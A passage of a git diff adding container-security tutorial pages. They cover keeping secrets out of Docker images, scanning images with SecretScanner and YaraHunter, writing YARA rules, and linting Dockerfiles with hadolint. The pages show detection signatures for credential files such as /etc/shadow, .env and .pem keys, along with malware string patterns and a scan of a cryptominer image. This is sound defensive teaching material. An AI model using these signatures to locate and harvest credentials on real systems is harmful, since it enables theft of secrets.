+ +```plaintext +FROM python:3.9-slim +ENV DATABASE_PASSWORD "SuperSecret" +``` + +## Don't Store Secrets in Images + +Secrets are sensitive pieces of information such as passwords, database credentials, SSH keys, tokens, and TLS certificates, to name a few. These should not be baked into your images without being encrypted since unauthorized users who gain access to the image can merely examine the layers to extract the secrets. + +Instead, they should be injected via: + +* Environment variables (at run-time) + +* Build-time arguments (at build-time) + +* An orchestration tool like Docker Swarm (via Docker secrets) or Kubernetes (via Kubernetes secrets) + +* Also, you can help prevent leaking secrets by adding common secret files and folders to your .dockerignore file: + + +```plaintext +**/.env +**/.aws +**/.ssh +``` + +be explicit about what files are getting copied over to the image rather than copying all files recursively: + +```plaintext +# BAD +COPY . . + +# GOOD +copy ./app.py . +``` + +## Environment Variables + +You can pass secrets via environment variables, but they will be visible in all child processes, linked containers, and logs, as well as via docker inspect. It's also difficult to update them. + +```plaintext +$ docker run --detach --env "DATABASE_PASSWORD=SuperSecret" python:3.9-slim + +d92cf5cf870eb0fdbf03c666e7fcf18f9664314b79ad58bc7618ea3445e39239 + + +$ docker inspect --format='{{range .Config.Env}}{{println .}}{{end}}' d92cf5cf870eb0fdbf03c666e7fcf18f9664314b79ad58bc7618ea3445e39239 + +DATABASE_PASSWORD=SuperSecret +PATH=/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin +LANG=C.UTF-8 +GPG_KEY=E3FF2839C048B25C084DEBE9B26995E310250568 +PYTHON_VERSION=3.9.7 +PYTHON_PIP_VERSION=21.2.4 +PYTHON_SETUPTOOLS_VERSION=57.5.0 +PYTHON_GET_PIP_URL=https://github.com/pypa/get-pip/raw/c20b0cfd643cd4a19246ccf204e2997af70f6b21/public/get-pip.py +PYTHON_GET_PIP_SHA256=fa6f3fb93cce234cd4e8dd2beb54a51ab9c247653b52855a48dd44e6b21ff28b +``` + +## Build-time Arguments + +```plaintext + +docker build --build-arg "DATABASE_PASSWORD=SuperSecret" . +``` + +rather then build time arguments you can use Multi-stage build so `docker history` will be ignored . The multi-stage build only retains the history for the final image. Keep in mind that you can use this functionality for permanent secrets that you need for your application, like a database credential. + +You can also use the --secret option in Docker build to pass secrets to Docker images that do not get stored in the images. + +refer create secret doc \[https://docs.docker.com/engine/reference/commandline/secret\_create/ \] \`\`\` + +# "docker" > secrets.txt + +FROM alpine + +# shows secret from default secret location: + +RUN --mount=type=secret,id=mysecret cat /run/secrets/mysecret + +```plaintext +This will mount the secret from the secrets.txt file. +``` + +docker build --no-cache --progress=plain --secret id=mysecret,src=secrets.txt . + +# output + +... #4 \[1/2\] FROM docker.io/library/alpine #4 sha256:665ba8b2cdc0cb0200e2a42a6b3c0f8f684089f4cd1b81494fbb9805879120f7 #4 CACHED + +#5 \[2/2\] RUN --mount=type=secret,id=mysecret cat /run/secrets/mysecret #5 sha256:75601a522ebe80ada66dedd9dd86772ca932d30d7e1b11bba94c04aa55c237de #5 0.635 docker #5 DONE 0.7s + +# exporting to image + +```plaintext +lets see the leaked secret +``` + +```❯ docker history 49574a19241c IMAGE CREATED CREATED BY SIZE COMMENT 49574a19241c 5 minutes ago CMD \["/bin/sh"\] 0B buildkit.dockerfile.v0 5 minutes ago RUN /bin/sh -c cat /run/secrets/mysecret # b… 0B buildkit.dockerfile.v0 4 weeks ago /bin/sh -c #(nop) CMD \["/bin/sh"\] 0B 4 weeks ago /bin/sh -c #(nop) ADD file:aad4290d27580cc1a… 5.6MB ``` + +but most modern way to scan docker images and file system you can use open source tool secretscanner that make developer life easy to detect leaked secretes + +pull latest secretscanner image + +```plaintext + +docker pull deepfenceio/deepfence_secret_scanner:latest +``` + + Pull docker image that you want to scan + +```plaintext +docker pull node:8.11 +``` + + Hund Secrets + +```plaintext +docker run -it --rm --name=deepfence-secretscanner -v $(pwd):/home/deepfence/output -v /var/run/docker.sock:/var/run/docker.sock deepfenceio/deepfence_secret_scanner:latest -image-name node:8.11 +``` + +output + +```plaintext +Scanning image /tmp/Deepfence/SecretScanning/df_node811/save-output.tar for secrets... + { + "Image Layer ID": "23d81b1ef111d5b6cec4559da8d7ad53f9ce5314134c9a232ecbb050b0269f76", + "Matched Rule ID": 85, + "Matched Rule Name": "Potential Linux passwd file", + "Matched Part": "path", + "String to Match": "", + "Signature to Match": "etc/passwd$", + "Severity": "medium", + "Severity Score": 5.00, + "Starting Index of Match in Original Content": 0, + "Relative Starting Index of Match in Displayed Substring": 0, + "Relative Ending Index of Match in Displayed Substring": 10, + "Full File Name": "etc/passwd", + "Matched Contents": "etc/passwd" + }, + { + "Image Layer ID": "23d81b1ef111d5b6cec4559da8d7ad53f9ce5314134c9a232ecbb050b0269f76", + "Matched Rule ID": 69, + "Matched Rule Name": "Shell profile configuration file", + "Matched Part": "filename", + "String to Match": "", + "Signature to Match": "^\\.?(bash_|zsh_)?profile$", + "Severity": "medium", + "Severity Score": 5.00, + "Starting Index of Match in Original Content": 0, + "Relative Starting Index of Match in Displayed Substring": 0, + "Relative Ending Index of Match in Displayed Substring": 7, + "Full File Name": "etc/profile", + "Matched Contents": "profile" + }, + { + "Image Layer ID": "23d81b1ef111d5b6cec4559da8d7ad53f9ce5314134c9a232ecbb050b0269f76", + "Matched Rule ID": 84, + "Matched Rule Name": "Potential Linux shadow file", + "Matched Part": "path", + "String to Match": "", + "Signature to Match": "etc/shadow$", + "Severity": "medium", + "Severity Score": 5.00, + "Starting Index of Match in Original Content": 0, + "Relative Starting Index of Match in Displayed Substring": 0, + "Relative Ending Index of Match in Displayed Substring": 10, + "Full File Name": "etc/shadow", + "Matched Contents": "etc/shadow" + }, + { + "Image Layer ID": "23d81b1ef111d5b6cec4559da8d7ad53f9ce5314134c9a232ecbb050b0269f76", + "Matched Rule ID": 68, + "Matched Rule Name": "Shell configuration file", + "Matched Part": "filename", + "String to Match": "", + "Signature to Match": "^\\.?(bash|zsh|csh)rc$", + "Severity": "medium", + "Severity Score": 5.00, + "Starting Index of Match in Original Content": 0, + "Relative Starting Index of Match in Displayed Substring": 0, + "Relative Ending Index of Match in Displayed Substring": 7, + "Full File Name": "etc/skel/.bashrc", + "Matched Contents": ".bashrc" + }, + { + "Image Layer ID": "23d81b1ef111d5b6cec4559da8d7ad53f9ce5314134c9a232ecbb050b0269f76", + "Matched Rule ID": 69, + "Matched Rule Name": "Shell profile configuration file", + "Matched Part": "filename", + "String to Match": "", + "Signature to Match": "^\\.?(bash_|zsh_)?profile$", + "Severity": "medium", + "Severity Score": 5.00, + "Starting Index of Match in Original Content": 0, + "Relative Starting Index of Match in Displayed Substring": 0, + "Relative Ending Index of Match in Displayed Substring": 8, + "Full File Name": "etc/skel/.profile", + "Matched Contents": ".profile" + }, + { + "Image Layer ID": "23d81b1ef111d5b6cec4559da8d7ad53f9ce5314134c9a232ecbb050b0269f76", + "Matched Rule ID": 68, + "Matched Rule Name": "Shell configuration file", + "Matched Part": "filename", + "String to Match": "", + "Signature to Match": "^\\.?(bash|zsh|csh)rc$", + "Severity": "medium", + "Severity Score": 5.00, + "Starting Index of Match in Original Content": 0, + "Relative Starting Index of Match in Displayed Substring": 0, + "Relative Ending Index of Match in Displayed Substring": 7, + "Full File Name": "root/.bashrc", + "Matched Contents": ".bashrc" + }, + { + "Image Layer ID": "23d81b1ef111d5b6cec4559da8d7ad53f9ce5314134c9a232ecbb050b0269f76", + "Matched Rule ID": 69, + "Matched Rule Name": "Shell profile configuration file", + "Matched Part": "filename", + "String to Match": "", + "Signature to Match": "^\\.?(bash_|zsh_)?profile$", + "Severity": "medium", + "Severity Score": 5.00, + "Starting Index of Match in Original Content": 0, + "Relative Starting Index of Match in Displayed Substring": 0, + "Relative Ending Index of Match in Displayed Substring": 8, + "Full File Name": "root/.profile", + "Matched Contents": ".profile" + }, + { + "Image Layer ID": "23d81b1ef111d5b6cec4559da8d7ad53f9ce5314134c9a232ecbb050b0269f76", + "Matched Rule ID": 88, + "Matched Rule Name": "Environment configuration file", + "Matched Part": "filename", + "String to Match": "", + "Signature to Match": "^\\.?env$", + "Severity": "medium", + "Severity Score": 5.00, + "Starting Index of Match in Original Content": 0, + "Relative Starting Index of Match in Displayed Substring": 0, + "Relative Ending Index of Match in Displayed Substring": 3, + "Full File Name": "usr/bin/env", + "Matched Contents": "env" + }, + { + "Image Layer ID": "23d81b1ef111d5b6cec4559da8d7ad53f9ce5314134c9a232ecbb050b0269f76", + "Matched Rule ID": 69, + "Matched Rule Name": "Shell profile configuration file", + "Matched Part": "filename", + "String to Match": "", + "Signature to Match": "^\\.?(bash_|zsh_)?profile$", + "Severity": "medium", + "Severity Score": 5.00, + "Starting Index of Match in Original Content": 0, + "Relative Starting Index of Match in Displayed Substring": 0, + "Relative Ending Index of Match in Displayed Substring": 7, + "Full File Name": "usr/share/base-files/profile", + "Matched Contents": "profile" + }, + { + "Image Layer ID": "23d81b1ef111d5b6cec4559da8d7ad53f9ce5314134c9a232ecbb050b0269f76", + "Matched Rule ID": 69, + "Matched Rule Name": "Shell profile configuration file", + "Matched Part": "filename", + "String to Match": "", + "Signature to Match": "^\\.?(bash_|zsh_)?profile$", + "Severity": "medium", + "Severity Score": 5.00, + "Starting Index of Match in Original Content": 0, + "Relative Starting Index of Match in Displayed Substring": 0, + "Relative Ending Index of Match in Displayed Substring": 7, + "Full File Name": "usr/share/doc/adduser/examples/adduser.local.conf.examples/profile", + "Matched Contents": "profile" + }, + { + "Image Layer ID": "45475acd15f3bb8a3b04367eda1a2553d6b18d95723eb51737bc9d9a24227336", + "Matched Rule ID": 0, + "Matched Rule Name": "Potential cryptographic private key", + "Matched Part": "extension", + "String to Match": ".pem", + "Signature to Match": "", + "Severity": "low", + "Severity Score": 2.50, + "Starting Index of Match in Original Content": 0, + "Relative Starting Index of Match in Displayed Substring": 0, + "Relative Ending Index of Match in Displayed Substring": 4, + "Full File Name": "etc/ssl/certs/ACCVRAIZ1.pem", + "Matched Contents": ".pem" + } +``` + +if you see about scan report its provide `Image Layer ID` and `Matched Rule Name` that describe about type of secret its detect also its provide `"Severity": "type", "Severity Score": 2.50`, with `"Matched Contents": "` + +## use .dockerignore file + +What should you add to the .dockerignore file? + +* Temporary files and folders + +* Build logs + +* Local secrets + +* Local development files like docker-compose.yml + +* Version control folders like ".git", ".hg", and ".svn" Example: + + +```plaintext +**/.git +**/.gitignore +**/.vscode +**/coverage +**/.env +**/.aws +**/.ssh +Dockerfile +README.md +docker-compose.yml +**/.DS_Store +**/venv +**/env +``` + +Check it out SecretScanner and support this project by giving gitstar ! + +[![Readme Card](https://github-readme-stats.vercel.app/api/pin/?username=deepfence&repo=SecretScanner)](https://github.com/deepfence/SecretScanner) + diff --git a/content/en/containersecurity/b17.Yarahunter 2.md b/content/en/containersecurity/b17.Yarahunter 2.md new file mode 100644 index 0000000..f23ad78 --- /dev/null +++ b/content/en/containersecurity/b17.Yarahunter 2.md @@ -0,0 +1,187 @@ +--- +title: " YaraHunter - Malware Scanner for Container Images " +slug: "YaraHunter - Malware Scanner for Container Images" +--- + + +## What is YARA ? + +YARA was originally developed by Victor Alvarez of VirusTotal and released on github in 2013 . + +> YARA , the "Pattern matching Swiss knife for malware researchers available on [github](https://github.com/VirusTotal/yara) + +#### Install yara on Mac + +```plaintext +brew install yara +``` + +#### Yara is extremely popular within because of different use case : + +* Identify and classify malware + +* Find new samples based on family-specific pattern + +* Deploy Yara Rules to identify samples and compromised device for incident response + + +#### Why Yara ? + +* Before Yara it was difficult for malware researcher To detect and classify large volumes of malware samples + +* can effective be used of hunting evolving malwares + +* Since Yara Rules are completely base on text , using an easy to understand syntax , they can be developed quickly + + +## How to write custom detection in YARA + +1. Start of the rule: Every YARA rule should be declared by using the keyword rule followed by an identifier , or unique rule would like to give your rule + +2. Add your meta section : the meta section can be used to provide comments or details about your rule information provided under meta will not be used for any variation of malware detection + +3. Declare string : this is where you can declare a variable and set it value each variable is indicated using $ sign followed by the variable name + +4. add your condition section : the condition section is where the rule declares what conditions must be met in order to rule to trigger a match . + + +### my first yara rule + +```plaintext +rule Hello_World + { + condition: + true +} +``` + +verify yara is installed or not + +```plaintext +yara --help +YARA 4.2.3, the pattern matching swiss army knife. +Usage: yara [OPTION]... [NAMESPACE:]RULES_FILE... FILE | DIR | PID + +Mandatory arguments to long options are mandatory for short options too. + + --atom-quality-table=FILE path to a file with the atom quality table + -C, --compiled-rules load compiled rules + -c, --count print only number of matches + -d, --define=VAR=VALUE define external variable + --fail-on-warnings fail on warnings + -f, --fast-scan fast matching mode + -h, --help show this help and exit + -i, --identifier=IDENTIFIER print only rules named IDENTIFIER + --max-process-memory-chunk=NUMBER set maximum chunk size while reading process memory (default=1073741824) + -l, --max-rules=NUMBER abort scanning after matching a NUMBER of rules + --max-strings-per-rule=NUMBER set maximum number of strings per rule (default=10000) + -x, --module-data=MODULE=FILE pass FILE's content as extra data to MODULE + -n, --negate print only not satisfied rules (negate) + -N, --no-follow-symlinks do not follow symlinks when scanning + -w, --no-warnings disable warnings + -m, --print-meta print metadata + -D, --print-module-data print module data + -e, --print-namespace print rules' namespace + -S, --print-stats print rules' statistics + -s, --print-strings print matching strings + -L, --print-string-length print length of matched strings + -g, --print-tags print tags + -r, --recursive recursively search directories + --scan-list scan files listed in FILE, one per line + -z, --skip-larger=NUMBER skip files larger than the given size when scanning a directory + -k, --stack-size=SLOTS set maximum stack size (default=16384) + -t, --tag=TAG print only rules tagged as TAG + -p, --threads=NUMBER use the specified NUMBER of threads to scan a directory + -a, --timeout=SECONDS abort scanning after the given number of SECONDS + -v, --version show version information +``` + +#### Now let the computer greet you: + +```plaintext +$ yara hello.yara /yara/malware/somefile.txt +``` + +```plaintext +rule GoodMorning + { + condition: + hour < 12 and hour >= 4 +} +``` + +#### Now let the computer greet you: + +```plaintext +yara hello.yara -d hour=11 ./yara/malware/somefile.txt +GoodMorning ./yara/malware/somefile.txt +``` + +#### structure of YARA rule file + +rule RULE\_NAME { // Rule definition goes here! // Comments in Yara rules look like this! } + +The β€œmeta” section of a rule contains the description, author, reference, date, hash, and any other relevant details of the rule. This section is optional and will not be used to classify malware. `meta: description = "This is just an example" threat_level = 3 in_the_wild = true` + +The β€œstrings” section contains string patterns that are used to identify malware. Each string in the β€œstrings” section is identified with a variable name starting with a dollar sign. + +```plaintext +strings: + $a = {6A 40 68 00 30 00 00 6A 14 8D 91} + $b = {8D 4D B0 2B C1 83 C0 27 99 6A 4E 59 F7 F9} + $c = "UVODFRYSIHLNWPEJXQZAKCBGMT" +``` + +You should put signature strings that are indicative of the malware here. This example uses hex strings and text strings. But you can also use regex patterns. `strings: $a = {6A 40 68 00 30 00 00 6A 14 8D 91} // Hex strings are enclosed within curly brackets. $b = "UVODFRYSIHLNWPEJXQZAKCBGMT" // Plain text strings are enclosed within double quotes. $c = /md5: [0-9a-fA-F]{32}/ // Regex patterns are enclosed within slashes.` Finally, the β€œcondition” section describes how the string patterns in the β€œstrings” section should be used to identify a piece of malware. You can use boolean (and, or, not), relational (>, <, =, and more), and arithmetic (+, -, \*, /, %) expressions in this section. In our example, the rule specifies that if one of the strings $a, $b, or $c is present, the file is a silent banker trojan. `condition: $a or $b or $c` You can also define more complicated conditions like these. ``` condition: #a > 2 and $b // If $a occurs more than twice and if $b is present + +condition: ($a and $b) or ($b and $c) // If both $a and $b are present, or both $b and $c are present ``` + +## Lets Bring Malware scanner for cloud-native, as part of CI/CD and at Runtime + +Deepfence's [YaraHunter](https://github.com/deepfence/YaraHunter) - scans container images, running Docker containers, and filesystems to find indicators of malware. It uses a [YARA ruleset](https://github.com/deepfence/yara-rules/blob/main/malware.yar) to identify resources that match known malware signatures, and may indicate that the container or filesystem has been compromised. + +### YaRadare can be used to detect malware in cloud-native applications in the following ways: + +* At rest: scan local container images, before they are deployed, to verify they do not contain malware + +* At runtime: scan running docker containers, if, for example, you observe unusual network traffic or CPU activity + +* Against filesystems: at any time, YaRadare can scan a local directory or filesystem for indicators of compromise + + +we all build and scan images but we never take look at malware that packaged inside container or even file system YaraHunter can hunt malware that present at your docker images or Kubernetes cluster or you can use in CI/CD pipeline + +#### pull image you want to scan + +Images may be compromised with the installation of a cryptominer such as XMRig. In the following example, we'll scan a legitimiate cryptominer image that contains the same xmrig software that is often installed through an exploit: + +```plaintext + docker pull metal3d/xmrig +``` + +#### Run YaraHunter as Docker Container and get result in json + +![](https://raw.githubusercontent.com/deepfence/YaraHunter/main/docs/docs/yarahunter/img/yarahunter.svg) + +``` bash +docker run -it --rm --name=deepfence-yarahunter +\-v /var/run/docker.sock:/var/run/docker.sock +\-v /tmp:/home/deepfence/output +deepfenceio/yara-hunter:latest --image-name metal3d/xmrig:latest +\--json-filename=xmrig-scan.json +``` + +```bash + + Using default tag: latest latest: Pulling from metal3d/xmrig 2408cc74d12b: Pull complete 75fcf72b2223: Pull complete 4e7c4ed53fb2: Pull complete Digest: sha256:c3c27a8b2f6beede6d9c0a7e5b79bb7a7b0002cca40565e7bfd2e447f3a2a628 Status: Downloaded newer image for metal3d/xmrig:latest docker.io/metal3d/xmrig:latest WARNING: The requested image's platform (linux/amd64) does not match the detected host platform (linux/arm64/v8) and no specific platform was requested INFO\[2022-09-09 00:53:43\] trying to connect to endpoint 'unix:///var/run/docker.sock' with timeout '10s' INFO\[2022-09-09 00:53:43\] connected successfully using endpoint: unix:///var/run/docker.sock INFO\[2022-09-09 00:53:43\] trying to connect to endpoint 'unix:///run/containerd/containerd.sock' with timeout '10s' WARN\[2022-09-09 00:53:53\] could not connect to endpoint 'unix:///run/containerd/containerd.sock': context deadline exceeded INFO\[2022-09-09 00:53:53\] trying to connect to endpoint 'unix:///run/k3s/containerd/containerd.sock' with timeout '10s' WARN\[2022-09-09 00:54:03\] could not connect to endpoint 'unix:///run/k3s/containerd/containerd.sock': context deadline exceeded INFO\[2022-09-09 00:54:03\] container runtime detected: docker +{ "Timestamp": "2022-09-09 00:54:27.639796179 +00:00", "Image Name": "metal3d/xmrig:latest", "Image ID": "a01f1ffa6691423ef43bfaee2a9c9f30fe08ee6df8d9d6586ae9692d90789c5a", "Malware match detected are": \[ { "Image Layer ID": "bad74b706fcd3e01f4af74337744cbcc84ab60da82c40dd588469c6360258789", "Matched Rule Name": "XMRIG\_Miner", "Strings to match are": \[ "stratum+tcp" \], "Category": \[\], "File Name": "/tmp/Deepfence/YaRadare/df\_metal3dxmriglatest/ExtractedFiles/bad74b706fcd3e01f4af74337744cbcc84ab60da82c40dd588469c6360258789/usr/local/bin/xmrig", "ref":"https://gist.github.com/GelosSnake/c2d4d6ef6f93ccb7d3afb5b1e26c7b4e ", "Summary": "The matched rule file's ref is https://gist.github.com/GelosSnake/c2d4d6ef6f93ccb7d3afb5b1e26c7b4e ." } , { "Image Layer ID": "bad74b706fcd3e01f4af74337744cbcc84ab60da82c40dd588469c6360258789", "Matched Rule Name": "XMRIG\_Miner", "Strings to match are": \[ "stratum+tcp" \], "Category": \[\], "File Name": "/tmp/Deepfence/YaRadare/df\_metal3dxmriglatest/ExtractedFiles/bad74b706fcd3e01f4af74337744cbcc84ab60da82c40dd588469c6360258789/xmrig-6.18.0/build/CMakeFiles/xmrig.dir/src/base/net/stratum/Url.cpp.o", "ref":"https://gist.github.com/GelosSnake/c2d4d6ef6f93ccb7d3afb5b1e26c7b4e ", "Summary": "The matched rule file's ref is https://gist.github.com/GelosSnake/c2d4d6ef6f93ccb7d3afb5b1e26c7b4e ." } , { "Image Layer ID": "bad74b706fcd3e01f4af74337744cbcc84ab60da82c40dd588469c6360258789", "Matched Rule Name": "Cerberus", "Strings to match are": \[ "cerberus" \], "Category": \["RAT","memory"\], "File Name": "/tmp/Deepfence/YaRadare/df\_metal3dxmriglatest/ExtractedFiles/bad74b706fcd3e01f4af74337744cbcc84ab60da82c40dd588469c6360258789/xmrig-6.18.0/src/3rdparty/fmt/README.rst", "description":"Cerberus ", "author":"Jean-Philippe Teissier / @Jipe\_ ", "date":"2013-01-12 ", "filetype":"memory ", "version":"1.0 ", "Summary": "The file /tmp/Deepfence/YaRadare/df\_metal3dxmriglatest/ExtractedFiles/bad74b706fcd3e01f4af74337744cbcc84ab60da82c40dd588469c6360258789/xmrig-6.18.0/src/3rdparty/fmt/README.rst has a memory match.The file has a rule match that Cerberus .The matched rule file's author is Jean-Philippe Teissier / @Jipe\_ .The matched rule file's date is 2013-01-12 .The matched rule file's filetype is memory .The matched rule file's version is 1.0 ." } , { "Image Layer ID": "bad74b706fcd3e01f4af74337744cbcc84ab60da82c40dd588469c6360258789", "Matched Rule Name": "XMRIG\_Miner", "Strings to match are": \[ "stratum+tcp" \], "Category": \[\], "File Name": "/tmp/Deepfence/YaRadare/df\_metal3dxmriglatest/ExtractedFiles/bad74b706fcd3e01f4af74337744cbcc84ab60da82c40dd588469c6360258789/xmrig-6.18.0/src/base/net/stratum/Url.cpp", "ref":"https://gist.github.com/GelosSnake/c2d4d6ef6f93ccb7d3afb5b1e26c7b4e ", "Summary": "The matched rule file's ref is https://gist.github.com/GelosSnake/c2d4d6ef6f93ccb7d3afb5b1e26c7b4e ." } , { "Image Layer ID": "bad74b706fcd3e01f4af74337744cbcc84ab60da82c40dd588469c6360258789", "Matched Rule Name": "XMRIG\_Miner", "Strings to match are": \[ "stratum+tcp" \], "Category": \[\], "File Name": "/tmp/Deepfence/YaRadare/df\_metal3dxmriglatest/ExtractedFiles/bad74b706fcd3e01f4af74337744cbcc84ab60da82c40dd588469c6360258789/usr/local/bin/xmrig", "ref":"https://gist.github.com/GelosSnake/c2d4d6ef6f93ccb7d3afb5b1e26c7b4e ", "Summary": "The matched rule file's ref is https://gist.github.com/GelosSnake/c2d4d6ef6f93ccb7d3afb5b1e26c7b4e ." } , { "Image Layer ID": "bad74b706fcd3e01f4af74337744cbcc84ab60da82c40dd588469c6360258789", "Matched Rule Name": "XMRIG\_Miner", "Strings to match are": \[ "stratum+tcp" \], "Category": \[\], "File Name": "/tmp/Deepfence/YaRadare/df\_metal3dxmriglatest/ExtractedFiles/bad74b706fcd3e01f4af74337744cbcc84ab60da82c40dd588469c6360258789/xmrig-6.18.0/build/CMakeFiles/xmrig.dir/src/base/net/stratum/Url.cpp.o", "ref":"https://gist.github.com/GelosSnake/c2d4d6ef6f93ccb7d3afb5b1e26c7b4e ", "Summary": "The matched rule file's ref is https://gist.github.com/GelosSnake/c2d4d6ef6f93ccb7d3afb5b1e26c7b4e ." } , { "Image Layer ID": "bad74b706fcd3e01f4af74337744cbcc84ab60da82c40dd588469c6360258789", "Matched Rule Name": "Cerberus", "Strings to match are": \[ "cerberus" \], "Category": \["RAT","memory"\], "File Name": "/tmp/Deepfence/YaRadare/df\_metal3dxmriglatest/ExtractedFiles/bad74b706fcd3e01f4af74337744cbcc84ab60da82c40dd588469c6360258789/xmrig-6.18.0/src/3rdparty/fmt/README.rst", "description":"Cerberus ", "author":"Jean-Philippe Teissier / @Jipe\_ ", "date":"2013-01-12 ", "filetype":"memory ", "version":"1.0 ", "Summary": "The file /tmp/Deepfence/YaRadare/df\_metal3dxmriglatest/ExtractedFiles/bad74b706fcd3e01f4af74337744cbcc84ab60da82c40dd588469c6360258789/xmrig-6.18.0/src/3rdparty/fmt/README.rst has a memory match.The file has a rule match that Cerberus .The matched rule file's author is Jean-Philippe Teissier / @Jipe\_ .The matched rule file's date is 2013-01-12 .The matched rule file's filetype is memory .The matched rule file's version is 1.0 ." } , { "Image Layer ID": "bad74b706fcd3e01f4af74337744cbcc84ab60da82c40dd588469c6360258789", "Matched Rule Name": "XMRIG\_Miner", "Strings to match are": \[ "stratum+tcp" \], "Category": \[\], "File Name": "/tmp/Deepfence/YaRadare/df\_metal3dxmriglatest/ExtractedFiles/bad74b706fcd3e01f4af74337744cbcc84ab60da82c40dd588469c6360258789/xmrig-6.18.0/src/base/net/stratum/Url.cpp", "ref":"https://gist.github.com/GelosSnake/c2d4d6ef6f93ccb7d3afb5b1e26c7b4e ", "Summary": "The matched rule file's ref is https://gist.github.com/GelosSnake/c2d4d6ef6f93ccb7d3afb5b1e26c7b4e ." } + +\] } + +``` + +Check it out YaraHunter and support this project by giving gitstar ! + +[![Readme Card](https://github-readme-stats.vercel.app/api/pin/?username=deepfence&repo=YaraHunter)](https://github.com/deepfence/YaraHunter) + + diff --git a/content/en/containersecurity/b18.Security-linting-dockerfile 2.md b/content/en/containersecurity/b18.Security-linting-dockerfile 2.md new file mode 100644 index 0000000..36911d9 --- /dev/null +++ b/content/en/containersecurity/b18.Security-linting-dockerfile 2.md @@ -0,0 +1,130 @@ +--- +title: "Security Linting of Dockerfiles" +description: " hadolint " +slug: "Security-linting-of-dockerfiles" +--- + + +# hadolint + +Hadolint comes with a robust and easy to use CLI. You can install it on a variety of platforms, including macOS using `brew install hadolint`. + +Confirm the installation was successful with the following command: + +``` + +$ hadolint --help +hadolint - Dockerfile Linter written in Haskell + +``` +We’ll use the following Dockerfile as an example, which can be used to run a Python Django web server. On the surface, it looks fine but we’ll see it has a lot of problems. + +```Dockerfile +FROM python +MAINTAINER xyx +LABEL org.website="xyz" + +RUN mkdir app && cd app + +COPY requirements.txt ./ +RUN pip install --upgrade pip +RUN pip install -r requirements.txt + +COPY . . + +CMD python manage.py runserver 0.0.0.0:80000 + + +``` + +Let’s run it through Hadolint: + +```bsh + +$ hadolint Dockerfile +Dockerfile:1 DL3006 warning: Always tag the version of an image explicitly +Dockerfile:1 DL3049 info: Label `maintainer` is missing. +Dockerfile:2 DL4000 error: MAINTAINER is deprecated +Dockerfile:3 DL3052 warning: Label `org.website` is not a valid URL. +Dockerfile:5 DL3003 warning: Use WORKDIR to switch to a directory +Dockerfile:5 SC2164 warning: Use 'cd ... || exit' or 'cd ... || return' in case cd fails. +Dockerfile:7 DL3045 warning: `COPY` to a relative destination without `WORKDIR` set. +Dockerfile:8 DL3013 warning: Pin versions in pip. Instead of `pip install ` use `pip install ==` or `pip install --requirement ` +Dockerfile:8 DL3042 warning: Avoid use of cache directory with pip. Use `pip install --no-cache-dir ` +Dockerfile:9 DL3059 info: Multiple consecutive `RUN` instructions. Consider consolidation. +Dockerfile:9 DL3042 warning: Avoid use of cache directory with pip. Use `pip install --no-cache-dir ` +Dockerfile:11 DL3045 warning: `COPY` to a relative destination without `WORKDIR` set. +Dockerfile:13 DL3025 warning: Use arguments JSON notation for CMD and ENTRYPOINT arguments + +``` + +Every violation takes on the following structure: + +A rule code is prefixed with either DL or SC. The DL prefix means the rule comes from Hadolint directly. The SC prefix means the rule comes from [SpellCheck](https://github.com/koalaman/shellcheck) which is a static analysis tool for shell scripts that comes with Hadolint out of the box. You can find the combined list of rules [here](https://github.com/hadolint/hadolint#rules). + +Every rule has a dedicated documentation page that lists code examples, rationale and other important details. See the dedicated page for [DL3006](https://github.com/hadolint/hadolint/wiki/DL3006) here. + +You can ignore one or more rules using the `--ignore RULECODE` option: + +```bash +$ hadolint --ignore DL3013 --ignore DL3042 Dockerfile + +``` +You can also ignore rules within the Dockerfile inline. I prefer this approach because you can exclude rule codes on a per-line basis and it’s more clear where the violation is actually happening. + +```bash +# hadolint ignore=DL3013 +RUN pip install --upgrade pip +``` + +Hadolint has an active open-source community. New rule codes are added on a regular basis so be sure to check you’re running the latest version of Hadolint every so often. + +# Severity level + + +The severity level indicates how critical a violation is. There are six levels: error, warning, info, style, ignore, and none. + +The CLI includes a --failure-threshold (abbreviated as -t) to exclude certain severity levels from causing a failure. For example, if you only want Hadolint to fail on error violations. + +```bash +$ hadolint -t error Dockerfile + +``` +Note, violations from other severity levels will still be reported but they won’t cause a failure. + +If you don’t agree with a rule code’s severity level, you can easily change it using the -- RULECODE option. For example, the following command upgrades DL3006 to error and downgrades DL3045 to info (both codes are warning by default): + +```bash +$ hadolint --error DL3006 --info DL3045 Dockerfile +Dockerfile:1 DL3006 error: Always tag the version of an image explicitly +Dockerfile:7 DL3045 info: `COPY` to a relative destination without `WORKDIR` set. + +``` + +# Fix the Dockerfile + +Working through each error one-by-one is a fantastic exercise for learning about Dockerfile best practices. As mentioned above, every rule has a very clear and detailed documentation page. Give it a shot and revisit this post when you’re done. + +At this point, Hadolint should report no errors. Your file should look similar to this: + +```bash +FROM python:3.10 +LABEL maintainer="xyz" +LABEL org.website="xyz" +WORKDIR /app +COPY requirements.txt ./ +# hadolint ignore=DL3013 +RUN pip install --upgrade --no-cache-dir pip && \ + pip install --no-cache-dir -r requirements.txt +COPY . . +CMD ["python", "manage.py", "runserver", "0.0.0.0:8000"] + +``` + +- Integrations + +Hadolint includes many convenient integrations for automatically running the linter throughout the development process. My favorites are: + +[VS Code](https://github.com/hadolint/hadolint/blob/master/docs/INTEGRATION.md#vs-code): run Hadolint directly in your editor +[pre-commit](https://github.com/hadolint/hadolint/blob/master/docs/INTEGRATION.md#pre-commit): run Hadolint on every git commit +[GitHub Actions](https://github.com/hadolint/hadolint/blob/master/docs/INTEGRATION.md#github-actions): run Hadolint in GitHub CI/CD diff --git a/content/en/containersecurity/b19.packetscanner 2.md b/content/en/containersecurity/b19.packetscanner 2.md new file mode 100644 index 0000000..1c76040 --- /dev/null +++ b/content/en/containersecurity/b19.packetscanner 2.md @@ -0,0 +1,195 @@ +--- +title: "Static Analysis of container images library for container " +description: " Packetstreamer " +slug: "Static Analysis of container images library for container" +--- + +# Packetstreamer + +SBOM and vulnerability scanner for container images + + +https://github.com/deepfence/package-scanner + + +Download binary + +- package-scanner_Darwin_arm64.tar.gz +- package-scanner_Darwin_x86_64.tar.gz +- package-scanner_Linux_arm64.tar.gz +- package-scanner_Linux_x86_64.tar.gz +- package-scanner_darwin_amd64_v1 +- package-scanner_darwin_arm64 +- package-scanner_linux_amd64_v1 +- package-scanner_linux_arm64 + + +ClI usage + +scan a docker image for vulnerabilities + +``` bash +./package-scannner -source 